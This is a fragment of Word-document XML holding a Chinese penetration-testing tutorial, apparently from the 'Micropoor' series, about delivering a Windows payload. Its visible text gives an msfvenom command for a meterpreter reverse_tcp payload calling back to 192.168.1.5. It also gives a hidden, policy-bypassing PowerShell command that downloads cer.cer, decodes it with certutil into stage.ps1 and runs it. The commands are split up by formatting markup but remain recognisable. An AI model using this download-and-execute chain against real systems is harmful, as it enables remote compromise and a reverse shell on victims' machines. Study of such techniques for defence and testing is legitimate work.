10401,3206,10391,3206,10379,3206,10367,3206,10354,3206,10340,3206,10326,3206,10310,3206,10293,3206,10275,3206,10256,3206,10236,3206,10215,3206,10192,3206,10168,3206,10143,3206,10117,3206,10090,3206,10061,3206,10031,3206,9999,3206,9966,3206,9931,3206,9895,3206,9858,3206,9819,3206,9778,3206,9735,3206,9691,3206,9646,3206,9598,3206,9549,3206,9498,3206,9445,3206,9391,3206,9334,3206,9275,3206,9215,3206,9153,3206,9088,3206,9022,3206,8953,3206,8883,3206,8810,3206,8735,3206,8658,3206,8578,3206,8497,3206,8413,3206,8326,3206,8238,3206,8146,3206,8053,3206,7957,3206,7859,3206,7758,3206,7654,3206,7548,3206,7439,3206,7328,3206,7214,3206,7097,3206,6977,3206,6855,3206,6730,3206,6602,3206,6471,3206,6337,3206,6201,3206,6061,3206,5918,3206,5773,3206,5624,3206,5472,3206,5317,3206,5159,3206,4997,3206,4833,3206,4665,3206,4494,3206,4319,3206,4141,3206,3960,3206,3776,3206,3587,3206,3396,3206,3201,3206,3002,3206,2800,3206,2594,3206,2385,3206,2172,3206,1955,3206,1734,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3206,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3205,1510,3204,1510,3204,1510,3204,1510,3203,1510,3203,1510,3202,1510,3202,1510,3201,1510,3200,1510,3200,1510,3199,1510,3198,1510,3197,1510,3196,1510,3195,1510,3193,1510,3192,1510,3190,1510,3189,1510,3187,1510,3185,1510,3184,1510,3182,1510,3179,1510,3177,1510,3175,1510,3172,1510,3170,1510,3167,1510,3164,1510,3161,1510,3158,1510,3154,1510,3151,1510,3147,1510,3144,1510,3140,1510,3135,1510,3131,1510,3127,1510,3122,1510,3117,1510,3112,1510,3107,1510,3102,1510,3096,1510,3090,1510,3084,1510,3078,1510,3072,1510,3065,1510,3059,1510,3052,1510,3044,1510,3037,1510,3029,1510,3021,1510,3013,1510,3005,1510,2996,1510,2987,1510,2978,1510,2969,1510,2959,1510,2949,1510,2939,1510,2929,1510,2918,1510,2907,1510,2896,1510,2885,1510,2873,1510,2861,1510,2849,1510,2836,1510,2823,1510,2810,1510,2797,1510,2783,1510,2769,1510,2754,1510,2740,1510,2725,1510,2709,1510,2694,1510,2678,1510,2661,1510,2645,1510,2628,1510,2610,1510,2593,1510,2574,1510,2556,1510,2537,1510,2518,1510,2499,1510,2479,1510,2459,1510,2438,1510,2417,1510,2396,1510,2374,1510,2352,1510,2330,1510,2307,1510,2284,1510,2260e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:111.600pt;width:445.800pt;height:48.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:180.600pt;width:467.400pt;height:80.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:280.800pt;width:467.400pt;height:283.20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生成payload：（有关生成payloa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d，会在未来的系列中讲到）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="371" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="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6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root@John</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: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tmp#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msfvenom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p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="8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windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="12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x64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meterpreter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="1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reverse_tcp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LHOST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=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192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1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.5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LPORT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=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53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cmd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powershell_base64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f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psh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o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Micropoor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t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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xt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6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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>启动apach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e：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195.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:326.399pt;width:467.400pt;height:192.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:579.600pt;width:467.400pt;height:181.800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36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w w:val="101"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powersh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="101"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ell框架设置：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w w:val="98"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:w w:val="98"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="98"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:w w:val="98"/>
          <w:spacing w:val="-25"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="98"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.1.5/Micropoor.txt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3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w w:val="153"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:w w:val="153"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ORY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90.599pt;width:467.400pt;height:194.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:345.600pt;width:467.400pt;height:71.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:477.600pt;width:467.400pt;height:163.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId1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8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RTUTIL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84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5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ALL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2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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1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5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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>混淆内容保</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存txt，后进行encode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328.200pt;width:7.200pt;height:7.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId18" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:202.500pt;width:449.500pt;height:75.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4050" coordsize="8990,1510">
        <v:shape style="position:absolute;left:1490;top:4050;width:8990;height:1510" coordorigin="1490,4050" coordsize="8990,1510" path="m1510,4076l1510,4076,1510,4076,1510,4076,1510,4076,1510,4076,1510,4076,1511,4076,1512,4076,1512,4076,1514,4076,1515,4076,1517,4076,1519,4076,1521,4076,1524,4076,1528,4076,1532,4076,1536,4076,1541,4076,1546,4076,1552,4076,1559,4076,1566,4076,1575,4076,1583,4076,1593,4076,1603,4076,1615,4076,1627,4076,1640,4076,1654,4076,1668,4076,1684,4076,1701,4076,1719,4076,1738,4076,1758,4076,1780,4076,1802,4076,1826,4076,1851,4076,1877,4076,1904,4076,1933,4076,1963,4076,1995,4076,2028,4076,2063,4076,2099,4076,2136,4076,2175,4076,2216,4076,2259,4076,2303,4076,2348,4076,2396,4076,2445,4076,2496,4076,2549,4076,2604,4076,2660,4076,2719,4076,2779,4076,2841,4076,2906,4076,2972,4076,3041,4076,3112,4076,3184,4076,3259,4076,3336,4076,3416,4076,3498,4076,3582,4076,3668,4076,3757,4076,3848,4076,3941,4076,4037,4076,4136,4076,4236,4076,4340,4076,4446,4076,4555,4076,4666,4076,4780,4076,4897,4076,5017,4076,5139,4076,5264,4076,5392,4076,5523,4076,5657,4076,5793,4076,5933,4076,6076,4076,6222,4076,6370,4076,6522,4076,6677,4076,6835,4076,6997,4076,7161,4076,7329,4076,7500,4076,7675,4076,7853,4076,8034,4076,8219,4076,8407,4076,8598,4076,8793,4076,8992,4076,9194,4076,9400,4076,9609,4076,9823,4076,10039,4076,10260,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4076,10484,4077,10484,4077,10484,4077,10484,4077,10484,4078,10484,4078,10484,4078,10484,4079,10484,4080,10484,4080,10484,4081,10484,4082,10484,4083,10484,4084,10484,4085,10484,4087,10484,4088,10484,4090,10484,4092,10484,4093,10484,4095,10484,4098,10484,4100,10484,4102,10484,4105,10484,4108,10484,4111,10484,4114,10484,4117,10484,4121,10484,4124,10484,4128,10484,4132,10484,4137,10484,4141,10484,4146,10484,4151,10484,4156,10484,4162,10484,4168,10484,4174,10484,4180,10484,4186,10484,4193,10484,4200,10484,4207,10484,4215,10484,4223,10484,4231,10484,4239,10484,4248,10484,4257,10484,4266,10484,4276,10484,4286,10484,4297,10484,4307,10484,4318,10484,4330,10484,4341,10484,4353,10484,4366,10484,4378,10484,4392,10484,4405,10484,4419,10484,4433,10484,4448,10484,4463,10484,4479,10484,4494,10484,4511,10484,4527,10484,4545,10484,4562,10484,4580,10484,4599,10484,4618,10484,4637,10484,4657,10484,4677,10484,4698,10484,4719,10484,4740,10484,4763,10484,4785,10484,4808,10484,4832,10484,4856,10484,4881,10484,4906,10484,4932,10484,4958,10484,4984,10484,5012,10484,5039,10484,5068,10484,5097,10484,5126,10484,5156,10484,5187,10484,5218,10484,5250,10484,5282,10484,5315,10484,5348,10484,5382,10484,5417,10484,5452,10484,5488,10484,5525,10484,5562,10484,5562,10484,5562,10484,5562,10484,5562,10484,5562,10484,5562,10483,5562,10482,5562,10482,5562,10480,5562,10479,5562,10477,5562,10475,5562,10473,5562,10470,5562,10466,5562,10462,5562,10458,5562,10453,5562,10448,5562,10442,5562,10435,5562,10428,5562,10419,5562,10411,5562,10401,5562,10391,5562,10379,5562,10367,5562,10354,5562,10340,5562,10326,5562,10310,5562,10293,5562,10275,5562,10256,5562,10236,5562,10215,5562,10192,5562,10168,5562,10143,5562,10117,5562,10090,5562,10061,5562,10031,5562,9999,5562,9966,5562,9931,5562,9895,5562,9858,5562,9819,5562,9778,5562,9735,5562,9691,5562,9646,5562,9598,5562,9549,5562,9498,5562,9445,5562,9391,5562,9334,5562,9275,5562,9215,5562,9153,5562,9088,5562,9022,5562,8953,5562,8883,5562,8810,5562,8735,5562,8658,5562,8578,5562,8497,5562,8413,5562,8326,5562,8238,5562,8146,5562,8053,5562,7957,5562,7859,5562,7758,5562,7654,5562,7548,5562,7439,5562,7328,5562,7214,5562,7097,5562,6977,5562,6855,5562,6730,5562,6602,5562,6471,5562,6337,5562,6201,5562,6061,5562,5918,5562,5773,5562,5624,5562,5472,5562,5317,5562,5159,5562,4997,5562,4833,5562,4665,5562,4494,5562,4319,5562,4141,5562,3960,5562,3776,5562,3587,5562,3396,5562,3201,5562,3002,5562,2800,5562,2594,5562,2385,5562,2172,5562,1955,5562,1734,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5562,1510,5561,1510,5561,1510,5561,1510,5561,1510,5561,1510,5560,1510,5560,1510,5559,1510,5559,1510,5558,1510,5557,1510,5557,1510,5556,1510,5555,1510,5554,1510,5552,1510,5551,1510,5550,1510,5548,1510,5546,1510,5544,1510,5542,1510,5540,1510,5538,1510,5536,1510,5533,1510,5530,1510,5527,1510,5524,1510,5521,1510,5517,1510,5513,1510,5509,1510,5505,1510,5501,1510,5496,1510,5492,1510,5487,1510,5481,1510,5476,1510,5470,1510,5464,1510,5458,1510,5452,1510,5445,1510,5438,1510,5431,1510,5423,1510,5415,1510,5407,1510,5399,1510,5390,1510,5381,1510,5371,1510,5362,1510,5352,1510,5341,1510,5331,1510,5320,1510,5308,1510,5297,1510,5285,1510,5272,1510,5259,1510,5246,1510,5233,1510,5219,1510,5205,1510,5190,1510,5175,1510,5159,1510,5143,1510,5127,1510,5110,1510,5093,1510,5076,1510,5058,1510,5039,1510,5020,1510,5001,1510,4981,1510,4961,1510,4940,1510,4919,1510,4897,1510,4875,1510,4853,1510,4829,1510,4806,1510,4782,1510,4757,1510,4732,1510,4706,1510,4680,1510,4653,1510,4626,1510,4598,1510,4570,1510,4541,1510,4512,1510,4482,1510,4451,1510,4420,1510,4388,1510,4356,1510,4323,1510,4290,1510,4256,1510,4221,1510,4186,1510,4150,1510,4113,1510,4076e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:203.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4070" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:4070;width:8990;height:10" coordorigin="1490,4070" coordsize="8990,10" path="m1510,4084l1510,4084,1510,4084,1510,4084,1510,4084,1510,4084,1510,4084,1511,4084,1512,4084,1512,4084,1514,4084,1515,4084,1517,4084,1519,4084,1521,4084,1524,4084,1528,4084,1532,4084,1536,4084,1541,4084,1546,4084,1552,4084,1559,4084,1566,4084,1575,4084,1583,4084,1593,4084,1603,4084,1615,4084,1627,4084,1640,4084,1654,4084,1668,4084,1684,4084,1701,4084,1719,4084,1738,4084,1758,4084,1780,4084,1802,4084,1826,4084,1851,4084,1877,4084,1904,4084,1933,4084,1963,4084,1995,4084,2028,4084,2063,4084,2099,4084,2136,4084,2175,4084,2216,4084,2259,4084,2303,4084,2348,4084,2396,4084,2445,4084,2496,4084,2549,4084,2604,4084,2660,4084,2719,4084,2779,4084,2841,4084,2906,4084,2972,4084,3041,4084,3112,4084,3184,4084,3259,4084,3336,4084,3416,4084,3498,4084,3582,4084,3668,4084,3757,4084,3848,4084,3941,4084,4037,4084,4136,4084,4236,4084,4340,4084,4446,4084,4555,4084,4666,4084,4780,4084,4897,4084,5017,4084,5139,4084,5264,4084,5392,4084,5523,4084,5657,4084,5793,4084,5933,4084,6076,4084,6222,4084,6370,4084,6522,4084,6677,4084,6835,4084,6997,4084,7161,4084,7329,4084,7500,4084,7675,4084,7853,4084,8034,4084,8219,4084,8407,4084,8598,4084,8793,4084,8992,4084,9194,4084,9400,4084,9609,4084,9823,4084,10039,4084,10260,4084,10484,4084e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:276.500pt;width:449.500pt;height:1.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,5530" coordsize="8990,30">
        <v:shape style="position:absolute;left:1490;top:5530;width:8990;height:30" coordorigin="1490,5530" coordsize="8990,30" path="m1510,5554l1510,5554,1510,5554,1510,5554,1510,5554,1510,5554,1510,5554,1511,5554,1512,5554,1512,5554,1514,5554,1515,5554,1517,5554,1519,5554,1521,5554,1524,5554,1528,5554,1532,5554,1536,5554,1541,5554,1546,5554,1552,5554,1559,5554,1566,5554,1575,5554,1583,5554,1593,5554,1603,5554,1615,5554,1627,5554,1640,5554,1654,5554,1668,5554,1684,5554,1701,5554,1719,5554,1738,5554,1758,5554,1780,5554,1802,5554,1826,5554,1851,5554,1877,5554,1904,5554,1933,5554,1963,5554,1995,5554,2028,5554,2063,5554,2099,5554,2136,5554,2175,5554,2216,5554,2259,5554,2303,5554,2348,5554,2396,5554,2445,5554,2496,5554,2549,5554,2604,5554,2660,5554,2719,5554,2779,5554,2841,5554,2906,5554,2972,5554,3041,5554,3112,5554,3184,5554,3259,5554,3336,5554,3416,5554,3498,5554,3582,5554,3668,5554,3757,5554,3848,5554,3941,5554,4037,5554,4136,5554,4236,5554,4340,5554,4446,5554,4555,5554,4666,5554,4780,5554,4897,5554,5017,5554,5139,5554,5264,5554,5392,5554,5523,5554,5657,5554,5793,5554,5933,5554,6076,5554,6222,5554,6370,5554,6522,5554,6677,5554,6835,5554,6997,5554,7161,5554,7329,5554,7500,5554,7675,5554,7853,5554,8034,5554,8219,5554,8407,5554,8598,5554,8793,5554,8992,5554,9194,5554,9400,5554,9609,5554,9823,5554,10039,5554,10260,5554,10484,5554e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:202.800pt;width:445.800pt;height:75.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId19" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:442.800pt;height:93.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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6026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把cer.cer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与Micropoo.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>放置同一目录下。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目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>标机执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="50" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="1324" w:firstLine="-15"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="4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powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="13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Win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hiddeN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Exec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ByPasS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add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content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11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path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> 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%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APPDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="10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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>\ce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r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dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t> 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(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New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Object</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="10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Net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WebClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="8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4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="dc4867"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DownloadString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(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'http://192.168.1.5/cer.c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659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>er'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)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;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certutil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decode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APPDATA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\cer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cer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%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APPDATA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\stage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7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ps1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&amp;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start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7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b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5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c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md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c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powershell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9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5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Exec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Bypass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9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NoExit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‐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File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%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>APPDATA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="8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\stage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6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ps1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
